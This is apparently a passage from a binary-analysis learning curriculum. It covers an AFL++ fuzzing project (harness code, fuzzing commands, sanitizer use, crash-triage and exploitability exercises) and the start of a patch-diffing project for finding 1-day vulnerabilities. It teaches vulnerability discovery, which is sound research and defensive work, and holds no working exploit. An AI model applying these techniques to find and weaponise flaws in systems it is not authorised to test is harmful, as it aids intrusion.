| Symbolic Execution Fundamentals | "Practical Binary Analysis" by Dennis Andriesse | Ch. 11.4: Symbolic Execution | Introduction to symbolic execution concepts |
| Binary Analysis Foundation | "Practical Binary Analysis" | Ch. 6: Disassembly and Binary Analysis Fundamentals | Understand what angr is analyzing |
| Dynamic Binary Instrumentation | "Practical Binary Analysis" | Ch. 11: Principles of Dynamic Binary Instrumentation | Related techniques (Pin, DynamoRIO) |
| Control Flow Graph Recovery | "Practical Binary Analysis" | Ch. 6.3: Control Flow Graphs | How angr discovers program structure |
| Assembly and Instruction Sets | "Low-Level Programming" by Igor Zhirkov | Ch. 3-5: Assembly Language | Understanding what VEX IR represents |
| Computer Architecture | "Computer Systems: A Programmer's Perspective" | Ch. 3: Machine-Level Representation | Foundation for understanding execution |
| Integer Representations | "Computer Systems: A Programmer's Perspective" | Ch. 2: Representing and Manipulating Information | Understand bitvector logic in Z3 |
| Memory and Addressing | "Computer Systems: A Programmer's Perspective" | Ch. 9: Virtual Memory | How angr models memory |
| Optimization Techniques | "Computer Systems: A Programmer's Perspective" | Ch. 5: Optimizing Program Performance | Understanding why some code paths are expensive |
| Linking and Loading | "Computer Systems: A Programmer's Perspective" | Ch. 7: Linking | How angr loads binaries |
| Dynamic Analysis | "Practical Malware Analysis" by Sikorski & Honig | Ch. 3: Basic Dynamic Analysis | Complementary dynamic analysis techniques |
| Control Flow Analysis | "Practical Malware Analysis" | Ch. 4: A Crash Course in x86 Disassembly | Reading assembly to understand paths |
| Anti-Analysis Bypass | "Practical Malware Analysis" | Ch. 16: Anti-Debugging | Using angr to bypass protections |
| Constraint Solving Basics | Z3 Tutorial Documentation | Entire tutorial | Understanding the solver angr uses |
| Academic Foundation | Academic Paper: "A Survey of Symbolic Execution Techniques" (Baldoni et al., 2018) | Full paper | Deep dive into symbolic execution research |
| Veritesting Technique | Paper: "Enhancing Symbolic Execution with Veritesting" (Avgerinos et al., 2014) | Full paper | Advanced technique for path merging |
| angr Framework | angr Official Documentation | Core Concepts, Examples, Advanced Topics | Comprehensive guide to angr usage |

Project 12: Fuzzing with AFL++

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for harnesses), Shell
  • Alternative Programming Languages: Python (for orchestration)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The "Service & Support" Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Vulnerability Discovery / Fuzzing
  • Software or Tool: AFL++, libFuzzer, Address Sanitizer
  • Main Book: "The Fuzzing Book" (online)

What you'll build: Fuzzing campaigns that automatically discover crashes and vulnerabilities in binary programs.

Why it teaches binary analysis: Fuzzing is how most modern vulnerabilities are found. Understanding fuzzing means understanding what makes programs crash.

Core challenges you'll face:

  • Writing harnesses → maps to calling the target function
  • Preparing corpus → maps to good starting inputs
  • Triaging crashes → maps to which crashes are exploitable?
  • Binary-only fuzzing → maps to QEMU mode, Frida

Resources for key challenges:

Key Concepts:

  • Coverage-Guided Fuzzing: AFL++ docs
  • Sanitizers: LLVM sanitizer docs
  • Persistent Mode: AFL++ performance docs

Difficulty: Advanced
Time estimate: 2-3 weeks
Prerequisites: C programming, Projects 1-3

Real world outcome:

# Compile target with instrumentation
$ afl-gcc -o target target.c

# Prepare input corpus
$ mkdir in out
$ echo "test" > in/seed1

# Start fuzzing
$ afl-fuzz -i in -o out ./target @@

# AFL++ output:
#        american fuzzy lop ++4.00c
# ┌─ process timing ─────────────────────────────────────┐
# │        run time : 0 days, 0 hrs, 23 min, 45 sec      │
# │   last new find : 0 days, 0 hrs, 0 min, 12 sec       │
# ├─ overall results ────────────────────────────────────┤
# │  cycles done : 847                                   │
# │ corpus count : 234                                   │
# │saved crashes : 3 (!)                                 │   ← Found bugs!
# │  saved hangs : 0                                     │
# └──────────────────────────────────────────────────────┘

# Triage crashes
$ for crash in out/crashes/*; do
    ./target "$crash" 2>&1 | head -5
done

Implementation Hints:

Writing a harness:

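// For AFL++ (file-based harness, plain C)
#include <stdio.h>
#include <stddef.h>

// Function under test; this signature is assumed from the call below
void parse_input(char *buf, size_t len);

int main(int argc, char **argv) {
    if (argc < 2) return 1;

    // Binary mode: fuzz inputs are arbitrary bytes, not text
    FILE *f = fopen(argv[1], "rb");
    if (!f) return 1;

    char buf[1024];
    size_t len = fread(buf, 1, sizeof(buf), f);
    fclose(f);

    // Call the function we want to fuzz
    parse_input(buf, len);
    return 0;
}

// For libFuzzer (separate C++ file; extern "C" is C++ syntax)
#include <stdint.h>
#include <stddef.h>

extern "C" void parse_input(char *buf, size_t len);

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    parse_input((char*)data, size);
    return 0;
}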

AFL++ modes:

  • Source mode: Compile with afl-gcc/afl-clang-fast
  • QEMU mode: Fuzz binaries without source (-Q flag)
  • Frida mode: Alternative for binary-only
  • Persistent mode: Faster fuzzing with loop

Sanitizers (compile with these for better crash detection):

# Address Sanitizer (memory bugs)
clang -fsanitize=address,fuzzer target.c

# Undefined Behavior Sanitizer
clang -fsanitize=undefined,fuzzer target.c

Learning milestones:

  1. Fuzz simple target → Find obvious crashes
  2. Write custom harness → Fuzz specific functions
  3. Triage crashes → Determine exploitability
  4. Fuzz binary-only → No source code available

The Core Question You're Answering

"How do we automatically generate millions of test inputs to stress-test software and uncover crashes, memory corruption, and security vulnerabilities, faster than any human could manually test?"

This project introduces coverage-guided fuzzing, a technique that uses code coverage feedback to intelligently generate inputs that explore new execution paths. You'll learn how fuzzers like AFL++ combine random mutation with evolutionary algorithms to find bugs that have eluded traditional testing for years.

Concepts You Must Understand First

  1. Coverage-Guided Fuzzing vs. Dumb Fuzzing
    • Dumb fuzzing: random inputs, no feedback (fast but inefficient)
    • Coverage-guided: monitors code coverage, prioritizes inputs that reach new code
    • Evolutionary algorithm: "interesting" inputs mutated to find more code

    Guiding Questions:

    • Why does code coverage feedback make fuzzing so much more effective than blind mutation?
    • What's the difference between edge coverage and block coverage?
    • How does AFL++ track which inputs discovered new paths?

    Book References:

    • "The Fuzzing Book" (online) - Chapter: Coverage-Based Fuzzing
    • "Fuzzing: Brute Force Vulnerability Discovery" by Sutton, Greene, Amini - Chapter 4: Feedback-Driven Fuzzing
  2. Code Instrumentation and Compile-Time Hooking
    • How afl-gcc/afl-clang inject coverage tracking code into binaries
    • Shared memory bitmap: fast communication between target and fuzzer
    • Hash collisions and edge coverage vs. exact hit count

    Guiding Questions:

    • What assembly instructions does AFL++ insert at each basic block?
    • Why use shared memory instead of file I/O for coverage feedback?
    • What happens when two different edges hash to the same bitmap index?

    Book References:

    • AFL++ Technical Whitepaper
    • "Practical Binary Analysis" by Dennis Andriesse - Chapter 11: Dynamic Binary Instrumentation (similar techniques)
  3. Genetic Algorithms in Fuzzing
    • Mutation strategies: bit flips, byte replacements, arithmetic operations
    • Crossover/splicing: combining parts of two interesting inputs
    • Fitness function: how "interesting" is this input? (new coverage? speed?)

    Guiding Questions:

    • Why does AFL++ keep a queue of "interesting" inputs instead of just one?
    • How does deterministic mutation differ from havoc mutation?
    • What makes an input worth saving to the corpus?

    Book References:

    • "The Fuzzing Book" - Chapter: Mutation-Based Fuzzing
    • "The Fuzzing Book" - Chapter: Grammar-Based Fuzzing (advanced: structured inputs)
  4. Sanitizers (ASan, UBSan, MSan)
    • AddressSanitizer (ASan): detects buffer overflows, use-after-free
    • UndefinedBehaviorSanitizer (UBSan): catches signed integer overflow, null deref
    • MemorySanitizer (MSan): finds uninitialized memory reads

    Guiding Questions:

    • Why doesn't a buffer overflow always cause an immediate crash?
    • How does ASan detect a 1-byte overflow that doesn't corrupt anything critical?
    • What's the performance cost of running with sanitizers?

    Book References:

    • LLVM Sanitizer Documentation
    • "The Fuzzing Book" - Chapter: Fuzzing with Grammars (discusses sanitizers)
    • Google AddressSanitizer Wiki
  5. Harness Design
    • Isolating the target function from I/O, state, and external dependencies
    • Persistent mode: fuzz in an in-process loop (the AFL++ docs cite roughly 10-20x speedups over fork-exec)
    • Shared memory fuzzing: even faster communication

    Guiding Questions:

    • Why is fork-exec fuzzing slower than persistent mode?
    • What state needs to be reset between iterations in persistent mode?
    • When would you NOT use persistent mode?

    Book References:

    • AFL++ Documentation - Persistent Mode
    • "The Fuzzing Book" - Chapter: Fuzzing APIs
  6. Corpus Distillation and Minimization
    • Corpus: collection of "interesting" inputs that trigger unique paths
    • Minimization: reducing input size while preserving path coverage
    • Why smaller inputs = faster fuzzing

    Guiding Questions:

    • Why does AFL++ trim queue inputs during fuzzing, and when would you minimize a crash input yourself with afl-tmin?
    • How can you merge multiple fuzzer output directories?
    • What's the trade-off between corpus size and fuzzing speed?

    Book References:

    • AFL++ Documentation - Corpus Management
    • "The Fuzzing Book" - Chapter: Reducing Failure-Inducing Inputs
  7. Binary-Only Fuzzing (QEMU Mode)
    • When source code isn't available (proprietary software, firmware)
    • QEMU user-mode emulation: CPU-level instrumentation
    • Performance cost: 2-5x slower than source-based fuzzing

    Guiding Questions:

    • How does AFL++ instrument a binary without recompiling?
    • Why is QEMU mode slower than compile-time instrumentation?
    • When would you use Frida mode instead of QEMU mode?

    Book References:

    • AFL++ Documentation - Binary-Only Fuzzing
    • QEMU User Mode Documentation
  8. Crash Triage and Exploitability
    • Not all crashes are exploitable (assertion failures, null deref in safe context)
    • Stack traces, registers, and memory dumps to understand root cause
    • Exploitability scoring: can an attacker control RIP/EIP?

    Guiding Questions:

    • What's the difference between a DoS crash and RCE crash?
    • How do you deduplicate crashes (same bug, different inputs)?
    • How does exploiting a heap overflow differ from exploiting a stack overflow?

    Book References:

    • "The Fuzzing Book" - Chapter: Debugging and Fixing Bugs
    • "Practical Malware Analysis" by Sikorski & Honig - Chapter 7: Analyzing Malicious Windows Programs (crash analysis)
    • "Hacking: The Art of Exploitation" by Jon Erickson - Chapter 0x300: Exploitation (exploitability)
  9. Fuzzing State Machines and Protocols
    • Stateful fuzzing: multiple requests in sequence (login → action → logout)
    • Protocol fuzzing: maintaining valid structure while mutating fields
    • Grammar-based fuzzing for structured inputs (JSON, XML, network protocols)

    Guiding Questions:

    • How do you fuzz a server that requires authentication?
    • Why is completely random data ineffective for JSON parsing?
    • How do you maintain protocol structure while still finding bugs?

    Book References:

    • "The Fuzzing Book" - Chapter: Fuzzing APIs
    • "The Fuzzing Book" - Chapter: Grammars and Parse Trees
    • "Fuzzing: Brute Force Vulnerability Discovery" - Chapter 11: Protocol Fuzzing
  10. Parallelization and Distributed Fuzzing
    • Running multiple fuzzer instances for better coverage
    • Main/secondary architecture (the -M and -S instances, historically called master/slave): instances share discoveries
    • Syncing corpus between fuzzers

    Guiding Questions:

    • Why doesn't running 10 fuzzers necessarily give you 10x the results?
    • How do AFL++ instances communicate discovered paths?
    • What's the optimal number of fuzzer instances for your CPU cores?

    Book References:

    • AFL++ Documentation - Parallelization
    • "The Fuzzing Book" - Chapter: Fuzzing with Grammars (scaling)
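Concept 2 above mentions a shared-memory bitmap and hash collisions. The classic AFL technical whitepaper describes the injected stub as `shared_mem[cur_location ^ prev_location]++; prev_location = cur_location >> 1;`. The sketch below models that update in pure Python. The `CoverageMap` class and the block IDs are made up for illustration; a real build assigns random IDs at compile time and keeps the map in shared memory.

```python
MAP_SIZE = 1 << 16  # classic AFL uses a 64 KiB map

class CoverageMap:
    """Toy model of the edge-coverage bitmap (not the real implementation)."""

    def __init__(self):
        self.bitmap = bytearray(MAP_SIZE)
        self.prev_location = 0

    def visit(self, cur_location: int) -> None:
        """Model of the stub injected at the start of each basic block."""
        index = (cur_location ^ self.prev_location) % MAP_SIZE
        self.bitmap[index] = (self.bitmap[index] + 1) & 0xFF  # 8-bit hit counter
        # The shift makes edge A->B land on a different index than B->A.
        self.prev_location = cur_location >> 1

    def edges(self) -> set:
        return {i for i, hits in enumerate(self.bitmap) if hits}

# Hypothetical block IDs chosen by hand for the demo.
A, B, C = 0x1234, 0x5678, 0x9ABC

def run(trace):
    cov = CoverageMap()
    for block in trace:
        cov.visit(block)
    return cov.edges()

# Same three blocks, different order: block coverage is identical,
# but the set of edge indices differs.
print(sorted(hex(i) for i in run([A, B, C])))
print(sorted(hex(i) for i in run([A, C, B])))
```

Because the index is a hash of two block IDs into a fixed-size map, two unrelated edges can collide. That is the trade-off the third guiding question under concept 2 asks about.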

Questions to Guide Your Design

  1. How do you design a good seed corpus for your target?
    • Should seeds be minimal? Diverse? Cover all features?
    • Where do you get seeds? (valid test files, documentation examples, web scraping)
    • How many seeds is optimal? (1? 100? 10,000?)
  2. What's your strategy for persistent mode harness design?
    • What state needs reset (globals, heap, file descriptors)?
    • How do you handle memory leaks in persistent mode?
    • When does cumulative state pollution become a problem?
  3. How do you prioritize which crashes to investigate first?
    • Stack smashing vs. heap corruption vs. null deref
    • Unique crash traces vs. duplicates
    • Consider: exploitability, severity, ease of fix
  4. When should you use AFL++ vs. libFuzzer?
    • AFL++: standalone binaries, fork-exec model, binary-only support
    • libFuzzer: in-process fuzzing, better for libraries/APIs, faster
    • Which for: file parser? Network server? Library function?
  5. How do you fuzz a program that requires specific input structure?
    • Use AFL++'s custom mutators? Grammar-based fuzzer?
    • Pre-process inputs to fix checksums/lengths?
    • Or just let fuzzer learn structure through feedback?
  6. What metrics tell you fuzzing is "done" or needs a different approach?
    • No new paths in N hours?
    • Diminishing returns on exec/sec?
    • Coverage plateau?
  7. How would you fuzz a network server with AFL++?
    • Harness that reads from file and sends to socket?
    • Preeny or AFL++'s socket-fuzzing utility (desocketing via LD_PRELOAD)?
    • Consider: connection handling, state, timeouts
  8. What's your approach for triaging hundreds of crash files?
    • Automated deduplication (stack hash, crash hash)
    • Minimization to reduce noise
    • Scripted triage: GDB automation, register dumps
    • Prioritization based on exploitability signals
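The "stack hash" idea from question 8 can be sketched as follows. This is one simple bucketing scheme, not a standard tool: it hashes the function names of the top frames in a sanitizer-style backtrace, ignoring addresses. The sample reports and crash names are hypothetical.

```python
import hashlib
import re

# Matches frames such as "#0 0x4005a3 in parse_header /src/parser.c:45".
FRAME_RE = re.compile(r"#\d+\s+0x[0-9a-f]+\s+in\s+(\S+)")

def stack_hash(report: str, top_n: int = 3) -> str:
    """Hash the function names of the top N frames; addresses are ignored."""
    frames = FRAME_RE.findall(report)[:top_n]
    return hashlib.sha1("|".join(frames).encode()).hexdigest()[:12]

def bucket(reports: dict) -> dict:
    """Group crash names by stack hash."""
    buckets = {}
    for name, report in reports.items():
        buckets.setdefault(stack_hash(report), []).append(name)
    return buckets

# Hypothetical triage input: crash name -> captured backtrace text.
reports = {
    "crash-000": "#0 0x4005a3 in parse_header /src/parser.c:45\n#1 0x4006f2 in main /src/main.c:12\n",
    "crash-001": "#0 0x4005a9 in parse_header /src/parser.c:45\n#1 0x4006f2 in main /src/main.c:12\n",
    "crash-002": "#0 0x400811 in read_pixels /src/pixels.c:88\n#1 0x4006f2 in main /src/main.c:12\n",
}

for digest, names in bucket(reports).items():
    print(digest, names)
```

Hashing names rather than addresses keeps buckets stable across rebuilds. The cost is that two distinct bugs in the same function will share a bucket, so treat each bucket as a starting point for manual review.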

Thinking Exercise

Exercise 1: Understanding Coverage Feedback

Consider this simple function:

void parse(char *input) {
    if (input[0] == 'A') {
        if (input[1] == 'B') {
            if (input[2] == 'C') {
                crash();  // Bug!
            }
        }
    }
}

Questions:

  1. Starting with seed "XXX", what mutations will AFL++ try?
  2. How many generations to reach "ABC" (on average)?
  3. Why would dumb fuzzing (pure random) take millions of tries?
  4. Draw the coverage map evolution as AFL++ discovers A, AB, ABC.
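To experiment with these questions, here is a toy coverage-guided loop in pure Python. It is a sketch of the feedback idea only and is far simpler than AFL++: one mutation operator, a set of branch labels instead of a bitmap, and a Python stand-in for the C `parse` function. All names are made up for illustration.

```python
import random

def parse(data: bytes) -> set:
    """Python stand-in for the C parse(); returns the branches reached."""
    covered = {"entry"}
    if len(data) > 0 and data[0] == ord("A"):
        covered.add("A")
        if len(data) > 1 and data[1] == ord("B"):
            covered.add("AB")
            if len(data) > 2 and data[2] == ord("C"):
                covered.add("crash")
    return covered

def mutate(data: bytes, rng: random.Random) -> bytes:
    """Replace one random byte with a random value."""
    buf = bytearray(data)
    buf[rng.randrange(len(buf))] = rng.randrange(256)
    return bytes(buf)

def fuzz(seed: bytes, rng: random.Random, max_execs: int = 200_000):
    corpus, seen = [seed], parse(seed)
    for execs in range(1, max_execs + 1):
        candidate = mutate(rng.choice(corpus), rng)
        coverage = parse(candidate)
        if "crash" in coverage:
            return candidate, execs
        if not coverage <= seen:  # reached a new branch: keep this input
            seen |= coverage
            corpus.append(candidate)
    return None, max_execs

crasher, execs = fuzz(b"XXX", random.Random(1))
print(crasher, "found after", execs, "executions")
```

Because each correct byte is saved as soon as it is found, the search proceeds one byte at a time. A dumb fuzzer has to guess all three bytes at once, which succeeds with probability 1 in 256^3 (about 16.8 million) per try.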

Exercise 2: Designing a Harness

You need to fuzz this library function:

int process_image(uint8_t *data, size_t len) {
    // Parses image header, processes pixels
    // Maintains internal state in global variables
    return 0;
}

Tasks:

  1. Write an AFL++ harness (file-based).
  2. Convert to persistent mode harness.
  3. What global state needs resetting?
  4. How do you handle if process_image crashes?

Exercise 3: Crash Triage

AFL++ found a crash with this input: AAAAAAAAAAAAAAAAAAAAAAAAAAAA... (100 A's)

GDB shows:

Program received signal SIGSEGV, Segmentation fault.
0x4141414141414141 in ?? ()

Questions:

  1. What type of vulnerability is this?
  2. Is it likely exploitable? Why?
  3. What register likely contains 0x4141414141414141?
  4. How would you confirm this is a buffer overflow vs. use-after-free?
  5. What's the next step: minimize input, write exploit, or file bug report?
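
One quick triage check for Exercise 3 is whether the faulting value is made of input bytes, and if so at which offset. The sketch below assumes a 64-bit little-endian target; `make_pattern` is a hypothetical helper that builds a short non-repeating input so the offset is unambiguous (with 100 identical A's every offset matches).

```python
import struct

def locate_in_input(fault_addr: int, data: bytes) -> int:
    """Offset in `data` of the little-endian 8-byte encoding of `fault_addr`, or -1."""
    needle = struct.pack("<Q", fault_addr)
    return data.find(needle)

def make_pattern(chunks: int = 26) -> bytes:
    """Non-repeating filler: 'AA0a', 'AA0b', ... so every 8-byte window is unique."""
    return b"".join(bytes([0x41, 0x41, 0x30, 0x61 + i]) for i in range(chunks))

# With all A's, the value is clearly attacker-controlled but the offset is ambiguous.
print(locate_in_input(0x4141414141414141, b"A" * 100))

# With a pattern, the value seen in the debugger maps back to one offset.
pattern = make_pattern()
observed = struct.unpack("<Q", pattern[72:80])[0]  # pretend GDB showed this value
print(locate_in_input(observed, pattern))
```

A result of -1 suggests the value did not come straight from the input, which is one hint that the crash may not be a simple linear overflow.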

Exercise 4: Optimizing Fuzzing Performance

Your fuzzer shows these stats:

exec speed: 150/sec
corpus count: 4500
last new path: 6 hours ago
stability: 95%

Questions:

  1. Is 150 exec/sec good or bad? (Depends on target complexity)
  2. What does stability below 100% (here 95%) indicate?
  3. What would you try to increase exec/sec?
  4. When should you stop fuzzing this campaign?

Exercise 5: Sanitizer Output Analysis

ASan reports:

==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000018
READ of size 4 at 0x602000000018
    #0 0x4005a3 in parse_header /src/parser.c:45
    #1 0x4006f2 in main /src/main.c:12

0x602000000018 is located 0 bytes to the right of 24-byte region
allocated by:
    #0 0x7f8b2e in malloc
    #1 0x4005f3 in parse_header /src/parser.c:42

Interpret this:

  1. What line contains the bug?
  2. What was the allocation size?
  3. How many bytes did the read overflow by?
  4. Is this a write or read overflow? (Check severity)
  5. What fix would you apply?
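
The arithmetic behind questions 2 to 4 can be checked mechanically. The following sketch parses the report text shown above with regular expressions; it is tailored to this excerpt and is not a general ASan parser (the alternative wording "after" is accepted on the assumption that other ASan versions phrase the location line that way).

```python
import re

REPORT = """\
==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000018
READ of size 4 at 0x602000000018
    #0 0x4005a3 in parse_header /src/parser.c:45
    #1 0x4006f2 in main /src/main.c:12

0x602000000018 is located 0 bytes to the right of 24-byte region
allocated by:
    #0 0x7f8b2e in malloc
    #1 0x4005f3 in parse_header /src/parser.c:42
"""

def summarize_asan(report: str) -> dict:
    """Pull the bug class, access, and overflow distance out of a report excerpt."""
    bug = re.search(r"AddressSanitizer: (\S+) on address", report).group(1)
    access = re.search(r"^(READ|WRITE) of size (\d+)", report, re.M)
    where = re.search(
        r"located (\d+) bytes (?:to the right of|after) (\d+)-byte region", report
    )
    top = re.search(r"#0 \S+ in (\S+) (\S+):(\d+)", report)
    gap, region = int(where.group(1)), int(where.group(2))
    size = int(access.group(2))
    return {
        "bug": bug,
        "access": access.group(1),
        "access_size": size,
        "region_size": region,
        "first_bad_offset": region + gap,  # offset of the access from the region start
        "bytes_past_end": gap + size,      # how far past the end the access reaches
        "faulting_frame": f"{top.group(1)} {top.group(2)}:{top.group(3)}",
    }

for key, value in summarize_asan(REPORT).items():
    print(f"{key}: {value}")
```

Here the 4-byte read starts exactly at the end of the 24-byte allocation, so all 4 bytes fall outside it.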

The Interview Questions They'll Ask

  1. "Explain how AFL++'s coverage-guided fuzzing works."
    • Expected Answer: AFL++ instruments the binary to track which edges (basic block transitions) are hit. It maintains a bitmap of discovered edges. For each input, it checks whether new edges are hit. If so, the input is "interesting" and is saved to the corpus for mutation. AFL++ mutates interesting inputs (bit flips, arithmetic, splicing) and repeats. Over time, it evolves inputs that explore deeper into the program, finding crashes in rare paths.
  2. "What's the difference between afl-gcc, afl-clang-fast, and afl-qemu?"
    • Expected Answer: afl-gcc: the legacy wrapper around GCC that injects instrumentation at the assembly level (the GCC plugin variant is afl-gcc-fast). afl-clang-fast: instruments through LLVM passes, which gives faster targets and more features such as persistent mode. afl-qemu (QEMU mode, afl-fuzz -Q): binary-only fuzzing via user-mode emulation; no source needed, but typically around 2-5x slower. Use afl-clang-fast when you have source and QEMU mode when you don't.
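  3. "Why is persistent mode faster than fork-exec mode?"
    • Expected Answer: A naive fork-exec loop pays for process creation, binary loading, and dynamic linking on every input. AFL++'s fork server already avoids the exec and linking cost but still forks once per input. Persistent mode runs the target function in a loop inside one process, so thousands of inputs share a single fork. The AFL++ documentation cites speedups on the order of 10-20x; the actual gain depends on how much per-process startup work the target does. Trade-off: state must be reset between iterations, otherwise leftover state causes unstable coverage and false crashes.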
  4. "What's AddressSanitizer and why use it with AFL++?"
    • Expected Answer: ASan is compiler instrumentation that detects memory errors (buffer overflows, use-after-free, double-free). It adds "red zones" around allocations and checks every memory access. With AFL++, ASan catches subtle bugs that don't immediately crash, turning silent corruption into loud crashes. Performance cost: roughly a 2x slowdown, but worth it for bug detection.
  5. "You've been fuzzing for 24 hours with no new paths. What do you do?"
    • Expected Answer: (1) Check coverage: have you plateaued at low coverage? (2) Improve the seed corpus: add diverse valid inputs. (3) Try a custom mutator for structured data. (4) Use a dictionary for magic bytes/keywords. (5) Try grammar-based fuzzing for complex formats. (6) Check whether the target does input validation that rejects most mutations. (7) Consider whether you've found all the easy bugs; deeper bugs might need symbolic execution or manual analysis.
  6. "How do you triage 500 crash files from a fuzzing campaign?"
    • Expected Answer: (1) Deduplicate: group crashes by a stack trace hash (afl-cmin in crash mode, -C, can also prune crashing inputs that add no new coverage). (2) Minimize: Use afl-tmin to reduce crash inputs to minimal size. (3) Exploitability: Prioritize based on crash type (RIP control > heap overflow > null deref). (4) Automate: Script GDB to dump registers/backtrace for each unique crash. (5) Categorize: File bugs by root cause. (6) Fix: Start with most severe/exploitable.
  7. "What's the difference between edge coverage and block coverage?"
    • Expected Answer: Block coverage: which basic blocks executed (e.g., blocks A, B, C). Edge coverage: which transitions between blocks executed (A→B, B→C). Edge coverage is more precise because the same blocks can be reached via different transitions. Example: if(x) {A();} else {B();} C(); has the edges start→A, A→C, start→B, and B→C. Code that can run A then B or B then A covers the same blocks either way but different edges, and AFL++ uses edge coverage to tell such paths apart.
  8. "How would you fuzz a closed-source binary?"
    • Expected Answer: Use AFL++'s QEMU mode (-Q flag) or Frida mode (-O flag). QEMU mode runs the binary under user-mode emulation and instruments basic blocks as they are translated. It is slower than source-based instrumentation but works without source. Steps: (1) afl-fuzz -Q -i in -o out -- ./binary @@. (2) Stripped binaries are fine, since no symbols are needed. (3) You may need to raise timeouts for the slower execution. (4) Alternative: hardware-based tracing with Intel PT, which some other fuzzers support and which can be faster than emulation.
  9. "Explain the concept of a 'deterministic' vs. 'havoc' stage in AFL++."
    • Expected Answer: Deterministic: systematic mutations such as every bit flip, byte flip, and arithmetic operation at every position. Thorough but slow. Havoc: random stacked mutations (several random changes per input) plus splicing. Fast exploration. Classic AFL runs the deterministic stage first for each new input and then switches to havoc; in AFL++, whether the deterministic stage runs by default has varied between versions, so check the documentation for your release. Deterministic finds "obvious" bugs, havoc finds complex multi-condition bugs.
  10. "You found a crash but the minimized input is still 10KB. Why might minimization fail to shrink it further?"
    • Expected Answer: (1) Bug requires multiple conditions spread across input. (2) Checksum/length field must match, so removing bytes breaks validity. (3) Complex state machine: a valid sequence is needed to reach the crash. (4) Minimizer's algorithm limitation (greedy approach can get stuck). Solutions: (1) Manual analysis to understand trigger. (2) Use structure-aware minimization. (3) Binary search on input chunks. (4) Check if crash is stable: does it reproduce consistently?
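
The edge-versus-block distinction from question 7 can be made concrete with the bitmap update described in the original AFL technical notes: index `cur ^ prev`, then set `prev = cur >> 1`. The sketch below mimics that update in Python; the block IDs are hypothetical constants (real instrumentation assigns random IDs at compile time) and hit counts are ignored.

```python
MAP_SIZE = 1 << 16  # size of the classic AFL coverage bitmap

def edge_indices(trace):
    """Map a sequence of block IDs to AFL-style bitmap indices."""
    hit, prev = set(), 0
    for cur in trace:
        hit.add((cur ^ prev) % MAP_SIZE)
        prev = cur >> 1  # the shift makes A->B and B->A land on different indices
    return hit

# Hypothetical block IDs for four basic blocks.
S, A, B, C = 0x1111, 0x2222, 0x3333, 0x4444
run_x = [S, A, B, C]  # visits A before B
run_y = [S, B, A, C]  # visits B before A

print("same blocks:", set(run_x) == set(run_y))
print("same edges: ", edge_indices(run_x) == edge_indices(run_y))
```

Both runs execute the same four blocks, so block coverage cannot distinguish them, while their edge sets differ. Because the index is a hash, unrelated edges can collide on one bitmap slot, which is a known cost of this scheme.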

Books That Will Help

Topic | Book | Chapter/Section | Why It Matters
Fuzzing Fundamentals | "The Fuzzing Book" by Andreas Zeller et al. (online) | Chapter: Coverage-Based Fuzzing | Comprehensive introduction to fuzzing concepts
Mutation Strategies | "The Fuzzing Book" | Chapter: Mutation-Based Fuzzing | How fuzzers generate new inputs
Grammar-Based Fuzzing | "The Fuzzing Book" | Chapter: Fuzzing with Grammars | Structured input fuzzing (JSON, XML)
Reducing Inputs | "The Fuzzing Book" | Chapter: Reducing Failure-Inducing Inputs | Input minimization techniques
Professional Fuzzing | "Fuzzing: Brute Force Vulnerability Discovery" by Sutton, Greene, Amini | Ch. 4: Feedback-Driven Fuzzing | Industry perspective on fuzzing
Protocol Fuzzing | "Fuzzing: Brute Force Vulnerability Discovery" | Ch. 11: Network Protocol Fuzzing | Fuzzing stateful systems
Binary Instrumentation | "Practical Binary Analysis" by Dennis Andriesse | Ch. 9: Binary Instrumentation | How instrumentation works (Pin, DynamoRIO, similar to AFL++)
Memory Corruption | "Hacking: The Art of Exploitation" by Jon Erickson | Ch. 0x300: Exploitation | Understanding crashes fuzzers find
Buffer Overflows | "Hacking: The Art of Exploitation" | Ch. 0x350: Buffer Overflows | What makes crashes exploitable
Shellcode and Payloads | "Hacking: The Art of Exploitation" | Ch. 0x500: Shellcode | Exploitation after finding crash
Heap Exploitation | "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron | Ch. 9.9: Dynamic Memory Allocation | Understanding heap bugs fuzzers find
Memory Safety | "Computer Systems: A Programmer's Perspective" | Ch. 9.11: Common Memory-Related Bugs | Types of vulnerabilities fuzzing discovers
Program Optimization | "Computer Systems: A Programmer's Perspective" | Ch. 5: Optimizing Program Performance | Understanding fuzzer performance
Crash Analysis | "Practical Malware Analysis" by Sikorski & Honig | Ch. 9: OllyDbg (debugging crashes) | Triaging fuzzer-discovered crashes
GDB for Triage | "The Art of Debugging with GDB, DDD, and Eclipse" by Matloff & Salzman | Entire book | Automating crash analysis
Sanitizers | Google AddressSanitizer Documentation | All sections | Using ASan/MSan/UBSan with fuzzers
LLVM Sanitizers | LLVM Sanitizer Documentation | All sections | Understanding sanitizer output
AFL++ Technical Details | AFL++ Official Documentation | All sections | Comprehensive AFL++ usage guide
Parallel Fuzzing | AFL++ Documentation | Parallelization section | Scaling fuzzing campaigns
QEMU Internals | QEMU User Mode Documentation | Technical documentation | Understanding binary-only fuzzing
Libfuzzer | libFuzzer Tutorial by Google | Full tutorial | Alternative in-process fuzzing

Project 13: Binary Diffing

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Ghidra scripts
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The "Micro-SaaS / Pro Tool"
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Patch Analysis / Vulnerability Research
  • Software or Tool: BinDiff, Diaphora, Ghidriff
  • Main Book: N/A (tool documentation)

What you'll build: A workflow and tooling that compares two versions of a binary to find what changed, useful for understanding patches and finding 1-day vulnerabilities.

Why it teaches binary analysis: Comparing old and new versions reveals exactly what was fixed, helping you understand vulnerabilities.

Core challenges you'll face:

  • Function matching → maps to identifying same function across versions
  • Diffing algorithms → maps to graph-based comparison
  • Finding security patches → maps to what was the vulnerability?
  • Interpreting results → maps to understanding the change

Resources for key challenges:

Key Concepts:

  • Function Matching: BinDiff documentation
  • Graph Isomorphism: Comparison algorithms
  • Patch Tuesday Analysis: Security research blogs

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 5 (Ghidra)

Real world outcome:

# Using ghidriff
